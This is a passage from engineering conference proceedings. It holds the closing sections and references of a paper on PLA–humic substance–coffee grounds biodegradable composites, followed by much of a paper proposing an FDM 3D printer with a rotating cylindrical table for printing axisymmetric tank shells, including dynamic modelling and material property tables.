Forecasting researches have been carried out to determine the most effective structure of new environmentally friendly polymer materials on the basis of PLA, HS and coffee waste. The possibility of forming various products from a composite material is shown, and a composition with a content of coffee grounds waste of 50% mass
456
V. Lebedev et al.
Fig. 6. 3D graphic for forecasting impact strength of hybrid eco-friendly biodegradable filled composites
deserves special attention. The increase in breaking stress during bending also indicates the manufacturability of the new polymer composite material. Thus, it becomes evident that the coffee grounds waste is evenly distributed in the PLA matrix. In addition, it even slightly “softens” the original rather rigid PLA polymer. All this, together with impact strength, suggests the possibility of forming various products from a composite material, while the composition with a content of coffee grounds waste 50% mass deserves particular attention. Modeling allows us to obtain models for forecasting the performance of hybrid eco-friendly biodegradable filled composites depending on their chemical composition, which can be adapted to any content of coffee grounds waste and HS.
6 Conclusions As a result of the research, computer modeling of chemical composition of hybrid ecofriendly biodegradable filled composites was performed. The optimal chemical composition of hybrid eco-friendly biodegradable filled composites based on PLA-HS-coffee grounds waste was determined. The scientific novelty of the study lies in the fact that, based on systematic experimental researches of the relationship between chemical composition of composite systems based on PLA, humic substances and coffee grounds waste, an adequate mathematical model for predicting strength characteristics of hybrid eco-friendly biodegradable filled composites was created. The possibility of forming various products from a composite material is shown, and a composition with a content of coffee grounds waste of 50% mass and HS over 0,5% mass deserves special attention. Computer models for forecasting the most important
Computer Modeling of Chemical Composition
457
performance characteristics of this composite were built. As a result of research, which was carried out in MathCad Prime 6.0, 3D charts for forecasting the performance properties of hybrid eco-friendly biodegradable filled composites depending on their chemical composition were built, which can be adapted to any content of coffee grounds waste and HS. Further research can be aimed at choosing the most optimal areas of application of the designed hybrid eco-friendly biodegradable filled composites based on the prediction of a complex of their strength properties according to the models obtained in this work.
References 1. Tawakkal, I.S.M.A., Cran, M.J., Miltz, J., Bigger, S.W.: A review of poly(lactic acid)-based materials for antimicrobial packaging. J. Food Sci. 79(8), 1477–1490 (2014). https://doi.org/ 10.1111/1750-3841.12534 2. Jamshidian, M., Tehrany, E.A., Imran, M., Jacquot, M., Desobry, S.: Poly-lactic acid: production, applications, nanocomposites, and release studies. Compr. Rev. Food Sci. Food Saf. 9(5), 552–571 (2010). https://doi.org/10.1111/j.1541-4337.2010.00126 3. Rebocho, A.T., et al.: Production of medium-chain length polyhydroxyalkanoates by pseudomonas citronellolis grown in apple pulp waste. Appl. Food Biotechnol. 6(1), 71–82 (2019). https://doi.org/10.22037/afb.v6i1.21793 4. Siriwong, C., Boopasiri, S., Jantarapibun, V., Kongsook, B., Pattanawanidchai, S., Sae-Oui, P.: Properties of natural rubber filled with untreated and treated spent coffee grounds. J. Appl. Polym. Sci. 135(13), 46060 (2018). https://doi.org/10.1002/app.46060 5. Essabir, H., Raji, M., Laaziz, S.A., Rodrique, D., Bouhfid, R., Qaiss, A.: Thermo-mechanical performances of polypropylene biocomposites based on untreated, treated and compatibilized spent coffee grounds. Compos. B Eng. 149, 1–11 (2018). https://doi.org/10.1016/j.compos itesb.2018.05.020 6. Moustafa, H., Guizani, C., Dupont, C., Martin, V., Jeguirim, M., Dufresne, A.: Utilization of torrefied coffee grounds as reinforcing agent to produce high-quality biodegradable PBAT composites for food packaging applications. ACS Sustain. Chem. Eng. 5(2), 1906–1916 (2017). https://doi.org/10.1021/acssuschemeng.6b02633 7. Lee, H.K., Park, Y.G., Jeong, T., Song, Y.S.: Green nanocomposites filled with spent coffee grounds. J. Appl. Polym. Sci. 132(23), 42043 (2015). https://doi.org/10.1002/app.42043 8. Wu, H., et al.: Effect of oil extraction on properties of spent coffee ground–plastic composites. J. Mater. Sci. 51(22), 10205–10214 (2016). https://doi.org/10.1007/s10853-016-0248-2 9. Zarrinbakhsh, N., Wang, T., Rodriguez-Uribe, A., Misra, M., Mohanty, A.K.: Characterization of wastes and coproducts from the coffee industry for composite material production. BioResources 11(3), 7637–7653 (2016). https://doi.org/10.15376/biores.11.3.7637-7653 10. Campos-Vega, R., Loarca-Piña, G., Vergara-Castañeda, H.A., Oomah, B.D.: Spent coffee grounds: a review on current research and future prospects. Trends Food Sci. Technol. 45(1), 24–36 (2015). https://doi.org/10.1016/j.tifs.2015.04.012 11. Esquivel, P., Jiménez, V.M.: Functional properties of coffee and coffee by-products. Food Res. Int. 46(2), 488–495 (2012). https://doi.org/10.1016/j.foodres.2011.05.028 12. Bessada, S.M.F., Alves, R.C., Oliveira, M.B.P.P.: Coffee silverskin: a review on potential cosmetic applications. Cosmetics 5(1), 5 (2018). https://doi.org/10.3390/cosmetics5010005 13. Bessada, S.M.F., Alves, R.C., Costa, A.S.G., Nunes, M.A., Oliveira, M.B.P.P.: Coffea canephora silverskin from different geographical origins: a comparative study. Sci. Total Environ. 645, 1021–1028 (2018). https://doi.org/10.1016/j.scitotenv.2018.07.201
458
V. Lebedev et al.
14. Cruz, M.V., et al.: Production of polyhydroxyalkanoates from spent coffee grounds oil obtained by supercritical fluid extraction technology. Biores. Technol. 157, 360–363 (2014). https://doi.org/10.1016/j.biortech.2014.02.013 15. Obruca, S., Benesova, P., Petrik, S., Oborna, J., Prikryl, R., Marova, I.: Production of polyhydroxyalkanoates using hydrolysate of spent coffee grounds. Process Biochem. 49(9), 1409–1414 (2014). https://doi.org/10.1016/j.procbio.2014.05.013 16. Lebedev, V., Tykhomyrova, T., Litvinenko, I., Avina, S., Saimbetova, Z.: Design and research of eco-friendly polymer composites. Mater. Sci. Forum 1006, 259–266 (2020). https://doi. org/10.4028/www.scientific.net/MSF.1006.259 17. Lebedev, V., Tykhomyrova, T., Filenko, O., Cherkashina, A., Lytvynenko, O.: Sorption resistance studying of environmentally friendly polymeric materials in different liquid mediums. Mater. Sci. Forum 1038, 168–174 (2021). https://doi.org/10.4028/www.scientific.net/MSF. 1038.168 18. Lebedev, V., Tykhomyrova, T., Lytvynenko, O., Grekova, A., Avina, S.: Sorption characteristics studies of eco-friendly polymer composites. In: E3S Web of Conferences, vol. 280, p. 11001 (2021). https://doi.org/10.1051/e3sconf/202128011001 19. Lebedev, V., Miroshnichenko, D., Xiaobin, Z., Pyshyev, S., Savchenko, D.: Use of humic acids from low-grade metamorphism coal for the modification of biofilms based on polyvinyl alcohol. Pet. Coal 63(3), 646–654 (2021) 20. Lebedev, V., Miroshnichenko, D., Xiaobin, Z., Pyshyev, S., Savchenko, D., Nikolaichuk, Y.: Use of humic acids from low-grade metamorphism coal for the modification of biofilms based on polyvinyl alcohol. Pet. Coal 63(4), 953–962 (2021) 21. Xu, X., Zhen, W.: Preparation, performance and non-isothermal crystallization kinetics of poly(lactic acid)/amidated humic acid composites. Polym. Bull. 75(8), 3753–3780 (2017). https://doi.org/10.1007/s00289-017-2233-6
A New FDM Printer Concept for Printing Cylindrical Workpieces Alexandr Salenko1(B) , Anton Kostenko1 , Daniil Tsurkan1 , Andryi Zinchuk1 , Mykhaylo Zagirnyak2 , Vadim Orel2 , Roman Arhat2 , Igor Derevianko3 , and Aleksandr Samusenko3 1 I. Sikorskyi NTUU KPI, Kyiv, Ukraine
[email protected] 2 Kremenchuk Mykhailo Ostrohradskyi National University, Kremenchuk, Ukraine 3 DB “Pivdenne”, Dnipro, Ukraine
Abstract. Printer layouts for FDM process are analyzed and systematized. It is shown that the use of fundamentally new approaches, which involve changing the base shape and movement type, in particular, replacing the traditional table with cylindrical rotating, allows you to better print products with thin cylindrical shells form. First of all, it concerns parameters of the received products durability. Tensile strength comparison for test specimens obtained by FDM processes on two printers, one of which is made according to the proposed concept, proves that the latter can be successfully used for the manufacture of axisymmetric tank housings with axial holes, providing a tensile strength of 0.75… 0.85 [σ] filament material against 0.45… 0.55 [σ] (when using conventional layout printers). The density of the plastic (as well as the accuracy of the form) is determined by the dynamic processes in the printer, which requires analysis and modeling of the behavior of the printer mechanical system. It is proved that the dynamic phenomena of acceleration and deceleration of rotating and linearly moving masses have a greater impact on density and accuracy, compared with traditional devices, which requires the introduction of special algorithms for controlling drives in transient modes. Keywords: FDM printing · cylindrical blanks · FDM quality · non-flatbed printing · mechanical system modeling
1 Introduction Methods of additive synthesis of prototypes, models and structural elements are currently one of the most promising ones in shaping, as they can be directly applied to the so-called “smart production”, aimed at obtaining fundamentally new products, materials, workpieces with minimal use of raw materials and maximum unification of the equipment. Even though today researchers around the world are actively searching for areas of use of additive technologies [1, 2], study the peculiarities of the formation of layers [3–5] and the product as a whole [6–8], these technologies are still poorly researched. However, the prospects for production are so wide that they encourage scientists to intensify © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 459–483, 2023. https://doi.org/10.1007/978-3-031-35467-0_28
460
A. Salenko et al.
their efforts in this area, discovering methods, techniques, and materials for the effective industrial application of these technologies. Thus, today additive processes have already gone beyond the limits of traditional application and are being actively introduced in construction and architecture [9, 10], biomedicine [11, 12], and chemistry. However, in all aspects of the technologies used, the “building up” of the object from the base (in the form of a plane – a flat table, foundation, substrate) remains unchanged. The main methods of additive production in accordance with [2] are given in Table 1. Among the listed methods, FDM processes are the simplest and most promising in terms of minimum costs and maximum quality [13]. The working body (head) must perform various movements forming a layered product [4, 14]. Different principles of head (desktop with model) positioning are applied: • movement in the Cartesian coordinate system, when the design includes three mutually perpendicular guides, along each of which either the print head or the base of the model moves; • by means of three parallelograms, when three radially symmetrically located motors coordinately shift the bases of three parallelograms attached to the print head; • autonomous position, when the print head is placed on its own chassis, and this structure moves entirely due to any drive that drives the chassis [15]; • 3D printer with rotating table – one or more axes of rotation instead of linear movement is used. Currently, there are two main methods of extruder positioning: moving orthogonal guides that coincide with the Cartesian coordinates of the head position and moving vertical linear coordinates that require recalculation of Cartesian coordinates for the so-called delta mechanism (mechanism with angular bars). The so-called KOSSEL is a representative of the latter. The most well-known and developed printer that implements the first principle is the PRUSA printer (or printers based on PRUSA – for example, PrintrBot). The Makerbot project (or analogue – Wanhao Duplicator) is another successful commercial project with a vertically moving table. The options for implementing the manipulating printer system are discussed in detail in paper [7]. The authors have provided a detailed description of both the manipulation systems used to carry out operation movements, and identified manufacturers that market certain design solutions for printers. All printers and modifications of manipulation systems use layer-by-layer scheme of spreading layers of material, with reproduction of the set model from a flat platform. In this case, the model (product) A is conditionally intersected by many surfaces si , parallel to the desktop XOY, each of which is one step δz away from the other, which is determined by the used nozzle (diameter d s , filament diameter Df , laying rate vs (Fig. 1). Other parameters of the printing process are the temperature of the base (table) T s , the temperature in the extruder T r , as well as the distance between the table and the adhesion surface δ. Due to such spreading of the layers a set of indicators of the finished product is formed, in particular, its accuracy (reproduced on the basis vectors x , y , z , strength σx, σy , σz , etc.). At the same time, a number of researchers who pay attention exclusively to the accuracy of shape reproduction [16, 17], surface quality [18], and deformability of
A New FDM Printer Concept for Printing Cylindrical Workpieces
461
Table 1. The methods of additive synthesis Type
Technology
Printing with several materials
Color printing
Description
Extrusion
Fused Deposition Modeling, FDM
+
+
Hardening of the material during cooling – the print head squeezes a drop of heated thermoplastic on the cooled platform-base. The droplets quickly solidify and stick together, forming layers of the future object
Robocasting, Direct Ink Writing, DIW
+
+
“Ink” (usually ceramic sludge) comes out of the nozzle in a liquid state, but immediately takes the desired shape due to the pseudo-plastic liquid
Photopolymeri-zation
Laser Stereo Lithograph, SLA
−
−
Ultraviolet laser illuminates the liquid photopolymer (through a photo template, or gradually, pixel by pixel)
Photopolymeri-zation
SLA-DLP
−
−
The DLP projector illuminates the photopolymer
Forming a layer on an even layer of powder
3D-Printing, 3DP
−
−
Bonding the powder by applying liquid glue by inkjet printing
Electron-beam melting, EBM
−
−
Melting of metal powder by electron beam in vacuum (continued)
462
A. Salenko et al. Table 1. (continued)
Type
Technology
Printing with several materials
Color printing
Description
Selective laser sintering, SLS
−
−
Melting of the powder under the action of laser radiation
Direct metal laser sintering, DMLS
−
−
Melting of metal powder under the action of laser radiation
Selective heat sintering SHS
−
−
Melting of the powder by the heating head
Supply of material in the form of a wire
Electron Beam Freeform Fabrication, EBF
+
+
Melting of the supplied wire material under the action of electronic radiation
Lamination
Laminated Object Manufacturing, LOM
+
+
The part is made from a large number of layers of working material, which are gradually superimposed on each other and glued together, while the laser (or cutting tool) cuts in each contour of the section of the future part
Point supply of powder Directed Energy Deposition
+
+
The supplied powder melts under the action of a laser or electron beam
Inkjet printing
+
+
The working material is applied by inkjet printing
Multi Jet Modeling, MJM
finished products after the process [19] have noted that these parameters are determined by both extrusion modes and the scheme of spreading the polymer melt. The same applies to another important issue – the problem of the strength of products, the possibility of using printed parts in structures and mechanisms [20]. We have already noted in [21]
A New FDM Printer Concept for Printing Cylindrical Workpieces
463
Fig. 1. The scheme of the formation of product A by FDM-printing
that the use of printed elements in working structures requires additional solutions to the problems of accuracy of printing (ensuring the quality of IT dimensions, the relative position of surfaces (IT/2), accuracy of form (IT/2… IT/3) surface roughness (Rz, Ra), ensuring the strength of the extruded material σm and interlayer strength σa . The authors of paper [21] have shown that during the FDM process with PEEKtype plastic, the surface morphology is directly affected by the melt pressure t r , due to the filament feed rate vf , and extrusion diameter d c . Moreover, with increasing melt pressure, the number of surface defects decreases. However, the fluctuating extrusion force is the main limitation of the stability of the extrusion process. Maximum filament compression force t r determines the maximum extrusion speed, and the minimum extrusion force is the main determining factor of slippage. Below the extrusion speed of 109.8 mm/min, the extrusion characteristic is in a relatively stable state. In this situation, fiber of the diameter Df can provide an extrusion force to maintain melt flows stably and continuously. During extrusion, a change in the size of the heated nozzle is observed, which is found to correlate with the instability of the PEEK thread size. There is a good linear relationship between the extrusion speed and the diameter of the extrusion thread in the range of extrusion speeds 5 mm/min < V e < 80 mm/min. This is generally well correlated with the results obtained in [22]. Experiments confirm that the laying angle and layer thickness δs have a significant effect on the strength and elongation at tension, compression and three-point bending. Optimal mechanical properties of PEEK are found in samples with a layer thickness of 300 μm and a laying angle of 0/90. The mechanical properties of PEEK and ABS samples are compared. It is concluded that the strength characteristics of the researched parts are lower for products obtained by 3D printing compared with the same samples but created from raw materials by thermoplastic machines. It is noted that the tensile strength of the printed sample with PEEK is about 56 MPa, which is equivalent to the strength of nylon parts in die casting. At the same time, the mechanical properties of printed samples with PEEK (in tension, compression and bending) are higher than those of ABS samples printed by commercial 3D printers by 108%, 114% and 115%, respectively, with almost no significant difference between the compression and bending module PEEK and ABS. In [23] the results of the research of the influence of fibers laying orientation on the quality of a surface are given, in particular, the geometrical model for definition of the profiles of roughness received with various angles of orientation of the press in FDM
464
A. Salenko et al.
processes is presented. The surface quality is controlled by the average height of the roughness profile (according to parameter Ra ). The authors have formulated the following conclusions: 1) at small print orientation angles, regular profiles are obtained in which the peak amplitude corresponds to the height of the layer. At large print orientation angles, the peak width increases, forming a flat area or a gap between successive peaks; 2) the effect of aliasing steps is a general trend inherent in both the simulated and experimental values of the amplitude roughness. The increments increase with increasing print orientation angle, and reaching the value of π/3, aliasing begins to decrease; 3) depending on the angles of laying, the shape of the profile curve changes. Assuming the difference in the properties of printed samples due to the weakening of the adhesive bond of the layers of material after hardening, some researchers have studied the process of spreading the layers and its effect on mechanical properties of the product and printing accuracy. The most thorough paper is [24], which allows to obtain a number of patterns based on the comparison of the processes of layering in FDM printing for ABS and PLA plastics. The main finding is the conclusion about the anisotropy of the properties of products, in some way oriented relative to the main basis vectors of the printer, i.e. [σx ] = [σy ] = [σz ]; [σi ] = f (i, j, k).
(1)
Therefore, we can assume that the new possibilities of printing important products are seen in the morphological analysis of options for both methods of laying filament, and in new layout solutions of such machines. That is why publications have recently begun to appear in which it is proposed to move from a three-coordinate manipulator to more complex ones, mainly to fivecoordinate ones. Based on the hypothesis that mechanical properties depend on the topology of the filament layout, which has been shown in several works, researchers are trying to propose new printer designs that allow the layout to be carried out in a rational way, including using additional rotary axes. Thus, in works [25, 26], the expediency of using 5-axis printers for forming curved surfaces, which have a lower roughness at small contour elevation angles (that is, when the elevation angle is only 3… 5°), is substantiated, and some surfaces are proposed to be formed at the expense correction of the δ parameter (distance from the laying surface to the exit of the extruder nozzle), as shown in [27, 28]. Special software is discussed in [29], and a typical design is given in [30]. At the same time, the authors conclude that the practice of using coordinate printers will be common soon. The same conclusion is also supported in [31], where, based on a comparison of printing characteristics, an increase in the strength parameters of products printed on 5-axis printers is shown. It can be concluded that the use of 5-axis systems can significantly expand the topological possibilities of laying out the filament, and thereby increase the resulting strength of products. The authors [32] prove that the use of such multi-coordinate systems is most expedient for case products and products with thin curved surfaces. A separate category of
A New FDM Printer Concept for Printing Cylindrical Workpieces
465
products to which increased strength requirements are imposed are axisymmetric shells (tanks) used in aviation, astronautics, and medicine [33]. If we consider that traditionally for such products it is mainly the outer surface of the product with tank fastening elements (under the flange, shut-off and control valves) that is important, and the number of products can be in the volume of a small or medium batch, the use of new approaches and printing methods is relevant. Such tanks, made by winding carbon or glass thread on a liner with subsequent impregnation with multi-component resins, require expensive technological equipment in manufacture, which makes the cost of such tanks uncompetitive compared with tanks obtained by conventional technologies. It is to produce tanks the use of additive processes is quite promising, but needs solutions of a number of problems related to the properties of strength, reliability, chemical neutrality, etc. The purpose of the article is to develop a conceptual solution for a printer that allows the formation of axisymmetric shells of increased strength and density by changing the topology of the filament layout. The object of research is the process of FDM printing. The subject of research is a printer of a new type with a liner collapsible table for laying out axisymmetric shells of increased strength.
2 Materials and Methods Attempts to systematize the mechanical systems used in 3D printers are given in [32]. But in our opinion, it is possible to significantly expand the number of options for the implementation of carrier systems based on the use of approaches to the analysis of structural and kinematic schemes proposed in the work [34, 35]. To describe the layout of processing equipment, one usually uses structural formulas based on the following principles. According to the ISO standard [36], the coordinate axis is always taken parallel to the axis of the main spindle, regardless of its location (Fig. 2). An extruder can be such a spindle for FDM equipment. The positive direction of Z axis is the direction from the workpiece to the tool and X axis is always taken horizontal. Additional motions parallel to X, Y, Z axes are denoted as U, V, W (secondary) and as P, Q, R (tertiary), respectively. Rotations around X, Y , Z axes are denoted as A, B, C and additional as D, E. Z axis is connected to the axis of the extruder; its positive direction is from the cut of the nozzle to the laying surface. X axis is always horizontal. The position of Y axis is determined by the location of the other two axes. Rotating motions around X, Y , Z axes are denoted by the letters A, B, C. Movable blocks are given the same signs as the coordinate movements performed by them (form-generating – in capital letters, auxiliary ones – in lowercase). The stationary block is marked O, which emphasizes the lack of movement. In structural formulas, the notation is written in the order of the blocks. The block carrying the workpiece is written in the formula on the far left, and the extruder – on the far right. The stationary block O separates the movements performed by the workpiece and the extruder.
466
A. Salenko et al.
Fig. 2. The coordinate system used to describe structural formulas
The distribution of elementary movements between the workpiece and the extruder depends on the position of the stationary block in the layout. From this point of view, we have the following printer layouts for linear movements (Table 2). Thus, the inversion of movable blocks, i.e. the provision of certain coordinate motions to the workpiece blocks instead of the extruder blocks proves that options 1–4 already exist (the second and third options are not widespread, the fourth option is three-axis control (X, Y, Z)). Option 6 is noteworthy (option 5 is less technological) – Zxy XYOPz Z, which implies the provision of feed movements of the workpiece installed in the horizontal plane while its thickness can compensate for the movement of the extruder along coordinate Z. On the basis of the genetic and morphological analysis of the embodiments of the carrier systems of printers, we have several options that are the simplest and most suitable for the main task – printing axisymmetric shells with high strength parameters. If we take into account that the axisymmetric shells, which are of the greatest practical interest, are made by winding on a liner of reinforcing thread (or fabric in the form of tape, Fig. 3), we add rotational motions about the y and x axes, and get a device corresponding to the formula abOzx and Fig. 4. The process parameters remain the same: table temperature T s , temperature in the extruder T r , head linear movement dynamics (its speed vs , as well as speed fluctuations), filament properties. The printing process can be as follows. Pre-printed flanges are installed on the table mandrel on both sides; the mandrel is placed in the center of the working traverse and fixed. Then the traverse is placed horizontally, the head is brought to the optimal distance and the process of laying out the filament begins with the rotation of the mandrel relative to a. When the laying process is completed, a rotation by corner β is performed with simultaneous movement of the head by value z, which allows connecting the flange with the cylindrical part of the tank due to the movements a, b and z.
A New FDM Printer Concept for Printing Cylindrical Workpieces
467
Table 2. Some layouts obtained on the basis of rearrangement of moving blocks No. 1
Formula ЗхуОXYPz(z)
Description The workpiece is stationary in the XOY plane, movable extruder, setting movement along z The workpiece moves along X, the movable extruder moves along Y, the setting movement –z
Draft
Note Typical printer layout
2
ЗхуXОYPz(z)
3
ЗхуYОXPz(z)
The workpiece moves along Y, the extruder moves along X, the setting movement – z
Also known layout ЗхуYО(x)Pz(z) – laying filament in the horizontal plane
4
ЗхуОXYZPz
Types: 2ЗхуYОXZPz; 4ЗхуYОXZPz
5
ЗхуХYОPz(z)
The workpiece is stationary, located in the XOY plane, the extruder performs all coordinate movements The workpiece performs controlled movements, the z-coordinate is setting, it is performed by the extruder
6
ЗхуХYОPzZ
The workpiece performs controlled movements, the Z coordinate is provided by the extruder
The most interesting layout corresponds to a system with a manipulator for printing
7
ЗхуХYZОPz
The workpiece performs all the movements
Layout with a movable platform
Known layout 2ЗхуХО(у)Pz(z) –operation with two extruders
468
A. Salenko et al.
Fig. 3. Spiral winding of an axisymmetric workpiece: 1 – mandrel (liner), 2 – folder, 3 – prepreg tape or reinforcing thread
Filament properties and type
Temperature in the extruder
Conditions for moving the working body
Dynamic elastic system
Temperature at the place of display (on the table)
Fig. 4. FDM printer layout for printing cylindrical shells (tanks) with end rounds
Thus, due to the angular motion β and linear a, b and z, it is possible to form a complete profile of the axisymmetric tank with different elements of the surface layer, as well as tanks with an internal honeycomb system. The latter is extremely important for the manufacture of cryogenic and thermostatic tank by this method (for example, for holding certain cryogenic liquids, fuels, etc.). In addition, the use of the proposed system makes it possible to manufacture tanks (cylinders) with automatic bonding of individual layers, which is carried out due to rational laying parameters that create the required thermal stresses after cooling.
A New FDM Printer Concept for Printing Cylindrical Workpieces
469
3 Experiments It is known [23] that the strength, accuracy and quality of the surface layer is determined by the conditions of laying the filament on base P, heat transfer processes on the table T (t) (plastic hardening phenomena) dynamic phenomena of the manipulation system, ζ (t). The following relations are true: Rzi = f (P, T (t), ζ (t)); Rzi ∈ Rz , σi = f (P, T (t), ζ (t)); σi ∈ σ , δi = f (P, T (t), ζ (t)); δi ∈ δ .
(2)
The set P is determined on the basis of known regularities and regression equations of conditionality of the controlled parameters Rz i , σi , δi by printing modes, [22], and functions T (t) and ζ (t) are obtained on the basis of known equations of thermal conductivity, heat and mass transfer, as well as dynamic modeling of the manipulation of the system and the carrier system of the printer under the action of inertial loads, concentrated masses, forces of useful resistance. A technical solution for the printing press is developed to determine possible dynamic perturbations according to the scheme in Fig. 4. It is presented in Fig. 5. In order to study the dynamic phenomena in the proposed concept of the printer, the dynamic modeling of the system is performed in the environment Matlab Simulink; the elements of the machine are divided into separate dynamic modules, Fig. 5b, interconnected by dynamic relations. This division is quite conditional, but makes it possible to track the basic patterns of dynamic phenomena and processes during printing, as well as to establish the boundaries and conditions of continuous operation of the printer. As examples of the created models the subsystem of the horizontal movement of a desktop as the most massive module (body 4, 3 Fig. 5(b)), and also a subsystem of the vertical movement of the carriage (body 1, 2 Fig. 5(b)) are considered. Calculation models of these modules are presented in Fig. 6. The concentrated masses are brought to extruder m1 and the horizontal movement frame m2 , which is joined to the vertical beam of the base (in the block of movement of the extruder axes x, z on the vertical beam of the printer); for the second module – to the horizontal support table m3 and the rotating table m4 , the connections between which are the most rigid due to the used hinges. Systems of differential equations of motion of concentrated masses for vertical and horizontal systems of bodies of each analyzed module are made. For the first module, the differential equations are of the form [26]: ⎧ 2 ⎨ m1 · ddtz21 = m1 g − Pv − c1 (z1 − z2 ) − b1 dzdt1 − dzdt2 . (3) ⎩ m2 · d 2 z22 = m2 g − c2 z2 − b2 dz2 + c1 (z1 − z2 ) + b1 dz1 − dz2 dt dt dt dt The second system of differential equations (horizontal) also takes into account nonlinear friction forces arising in the guides of longitudinal movement (Fig. 6b), which
470
A. Salenko et al.
Body 2 Body 1
Body 4
Body 3 (а)
(b)
Fig. 5. The concept of the machine (a) and its division into dynamic modules (b)
Fig. 6. Models of machine blocks with the shown external forces acting on bodies ((a) – the first vertical force, (b) – the second horizontal force)
is reduced to the standard form for further modeling: ⎧ 2 ⎨ m4 · ddtz24 = −Ph − μ · m4 g · sgn dzdt4 − c3 (z4 − z3 ) − b3 dzdt4 − dzdt3 ⎩ m3 · d 2 z23 = −μ · m3 g · sgn dz3 − c3 z3 − b3 dz3 + c3 (z4 − z3 ) + b3 dz4 − dt dt dt dt
dz3 dt
. (4)
A New FDM Printer Concept for Printing Cylindrical Workpieces
471
The performed models of the reduced systems of differential equations in the Matlab Simulink environment are presented in Fig. 7a, b; Fig. 7b shows only a fragment that takes into account the nonlinearity of friction forces. Modeling of the heat transfer process in the elements of the studied structure is performed using a software environment ANSYS. The calculation is based on the numerical solution to the initial-boundary value problem for the thermal conductivity equation [19]: ∂ ∂ ∂ ∂T (x, y, z, τ ) ∂T (x, y, z, τ ) ∂T (x, y, z, τ ) ∂T = λx + λy + λz , ρc ∂τ ∂x ∂x ∂y ∂y ∂z ∂z (5) where T (t, x, y, z) is temperature distribution function; λx , λy , λz is thermal conductivity coefficients in the direction of axes x, y, z; ρ is density, c is specific heat of the environment. The of deformations of the table elements is made taking into account calculation 1 dV β = V dT . p
Based on model experiments, a simplified rotating table-drum with an outer diameter of 100.0 mm is made, Fig. 8. The basic printer ENDER 3 PRO is used for research, on which a rotating table is additionally installed; the movement along Y coordinate is changed to the setting-up (adjustment) mode, instead the printer driver is connected to the R rotating coordinate with the corresponding reprogramming of the movement controller. Movements along X, Z coordinates remain unchanged. The print head is also modified to ensure its heating up to 430 °C. For PLA-carbon material with properties given in Table 3, print modes are as follows: vp = 50 mm/s, T 0 = 75 °C, T e = 225 °C; for PEEK-plastic (Table 4) are vp = 40 mm/s, T 0 = 140 °C, T e = 430 °C. Laying density is 80%, full filling along the outer contour. Several workpieces are laid – both standard test specimens to check the strength characteristics and cellular systems, Fig. 9.
4 Results Table 5 contains the values of the parameters of stiffness, damping, as well as the values of the concentrated masses. Reduced masses m1−4 , kg are taken from the three-dimensional assembly model in Solidworks, the stiffness values c1−4 , N/m and damping factors b1−4 , N·s/m are taken approximately for this type of machine. The modeling results (Fig. 10, 11) allow us to come to several important conclusions. The module of vertical movement of the print head is sufficiently stable in operation, because the movement rate is quite low, and the nonlinearity of friction forces can be neglected because they are much smaller than the gravitational forces, which the drive – a stepper motor with ball-screw transmission must overcome. Transient processes, Fig. 10, after a change in traffic conditions cause short-term fluctuations of small amplitude, which quickly attenuate. Force Pv that occurs during printing is relatively small and may be neglected. The stability and steadiness of the system remain satisfactory over the entire range of displacements, speeds and positions. Considering nonlinear friction forces changes the picture of transient processes quite significantly, Fig. 11. When moving the working body, the value of the friction force does
472
A. Salenko et al.
Fig. 7. Simulink model for solution to the systems of differential equations of the analyzed 3-D printer modules: (a) vertical; (b) horizontal
A New FDM Printer Concept for Printing Cylindrical Workpieces
473
Fig. 8. Embodiment of a cylindrical table for laying
Table 3. The properties of PLA-carbon materials Properties
ASTM
Test Condition
Units
Typical Values
Tensil Strength
D638
50 mm/min
MPa
56
Elongation
D638
50 mm/min
%
9
Flexural Strength
D790
2 mm/min
MPa
89
Flexural Modulus
D790
2 mm/min
MPa
2570
Impast Strength, IZOD notched
D256
3.2 mm, 23 °C
KJ/m2
3.4
D648
0.45 MPa, 6.4mm
°C
130–140
Melt Flow Rate
D1238
190 °C, 2.16 kg
g/l0min
5
Specific Gravity
D792
23 °C
g/cm3
1.282
Mold Shrinkage
D955
23 °C
%
0.5
Mechanical
Thermal Heat Distortion Temp Others
not change, but only the direction of action changes – as opposed to the direction of the movement of the module elements. However, they are sufficiently inertial for the point connection of a horizontally moving table and a rotating drum. Changing the dynamic parameters of the model, increasing the stiffness of the joints of the drum with its holding elements, results in improved dynamic properties of the entire system – reducing the frequency and amplitude of oscillations. The application in the working bodies braking algorithms at the end of the working stroke in coordination with the connected drives has a positive effect. Thus, it can be stated that the satisfactory dynamics of the printer of the proposed concept can be achieved by appropriate technical solutions.
474
A. Salenko et al. Table 4. The properties of PEEK-plastics
Indicators
TECAPEEK (PEEK)
TECAPEEK HT (PEK)
TECAPEEK ST (PEKEKK)
Tg
150 °C
160 °C
165 °C
Density
1.31 g/cm3
1.31 g/cm3
1.32 g/cm3
Modulus of elasticity
4,200 MPa
4,600 MPa
4,600 MPa
Operating temperature, const
260 °C
260 °C
260 °C
Operating temperature, short
300 °C
300 °C
300 °C
Minimal operating temperature (switch off at t up to −100 °C, increase of fragility)
−40 °C
−40 °C
−40 °C
Tensil Strength of filament, MPa, 50 mm/min
97 MPa
103 MPa
86 MPa
Fig. 9. Workpieces obtained by printing on different bases: (a) test specimens; (b) honeycombs laid out on a flat base; (c) the honeycomb is formed on both flat and cylindrical bases; (d) fuel tank demonstrator
Models of systems of differential equations created in the Matlab Simulink environment can be used for modeling the dynamic processes for the purpose of forecasting the processing errors, the improvement of the design; both two-mass elastic-damping nonlinear models require specification of dynamic characteristics (masses mi , stiffness ci and damping factors bi ) to improve the accuracy; the necessary transfer functions can be received due to the models by means of Linear Analysis Tool. To determine the static deformations and errors that will be introduced into the overall balance of inaccuracies in the reproduction of the printed workpiece, a static analysis of the carrier system is performed in the environment Autodesk Inventor. The own weight of the parts, and dynamic loadings of elements during operation of the printer are used as loading. Static forces arising during printing are neglected. “Clamping” support is adjusted to the lower base plate. Grid and contacts are created
A New FDM Printer Concept for Printing Cylindrical Workpieces
475
Table 5. Dynamic parameters of models Characteristic, measurement unit
Values
Characteristic, measurement unit
Values
m1 , kg
6
c4 , N/m
4 · 106
m2 , kg
15.5
b1 , N·s/m
300
m3 , kg
15
b2 , N·s/m
600
m4 , kg
4.5
b3 , N·s/m
300
c1 , N/m
2 · 106
b4 , N·s/m
600
c2 , N/m
4 · 106
Pv , N
0.3
c3 , N/m
2 · 106
Ph , N
0.1
Fig. 10. The results of modeling the vertical module: (a) change of the coordinates z1 and z2 in the period of oscillation damping; (b) the value of the coordinate, speed and acceleration of the first body in the period of oscillation damping
